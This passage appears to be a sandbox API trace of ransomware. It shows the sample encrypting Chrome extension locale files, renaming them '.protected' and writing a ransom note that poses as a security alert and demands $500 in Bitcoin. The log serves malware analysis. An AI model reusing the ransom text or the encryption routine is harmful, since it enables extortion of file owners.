pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\..") returned 144 [0080.610] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.610] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.611] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.611] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.611] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.611] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.611] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.612] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.612] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.612] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0080.612] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.612] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x12c, lpOverlapped=0x0) returned 1 [0080.613] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.613] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x12c, lpOverlapped=0x0) returned 1 [0080.613] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.613] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.613] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.613] CloseHandle (hObject=0x168) returned 1 [0080.614] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.protected") returned 165 [0080.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.protected")) returned 1 [0080.614] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.614] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.614] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\RESTORE_FILES.txt") returned 159 [0080.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.615] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.615] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.616] lstrlenA (lpString="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") returned 684 [0080.616] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.616] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.616] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.616] CloseHandle (hObject=0x164) returned 1 [0080.616] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0080.616] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0080.616] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms") returned 141 [0080.616] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0080.616] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0080.616] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*") returned 143 [0080.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.616] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.617] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.617] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.617] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.617] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.617] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\.") returned 143 [0080.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.617] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.617] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.617] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.617] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.617] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.617] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.617] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\..") returned 144 [0080.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.617] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.617] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.617] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.617] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.617] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.617] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.617] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.618] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.618] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.618] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json") returned 155 [0080.618] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.618] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0080.619] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.619] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0080.619] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.619] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.619] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.619] CloseHandle (hObject=0x168) returned 1 [0080.619] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.protected") returned 165 [0080.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.protected")) returned 1 [0080.620] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.620] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.620] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0080.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.621] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.621] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.622] lstrlenA (lpString="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") returned 684 [0080.622] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.622] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.622] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.622] CloseHandle (hObject=0x164) returned 1 [0080.622] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="Windows") returned -1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="Program Files") returned -1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="Program Files (x86)") returned -1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="$Recycle.bin") returned 1 [0080.622] lstrcmpiW (lpString1="ne", lpString2="System Volume Information") returned -1 [0080.622] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne") returned 141 [0080.622] lstrcmpW (lpString1="ne", lpString2=".") returned 1 [0080.622] lstrcmpW (lpString1="ne", lpString2="..") returned 1 [0080.622] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*") returned 143 [0080.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.623] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.623] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.623] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.623] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.623] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\.") returned 143 [0080.623] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.623] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.623] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.623] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.623] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.623] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.623] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\..") returned 144 [0080.623] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.623] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.623] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.623] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") returned 155 [0080.623] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.623] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.623] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.623] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.624] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json") 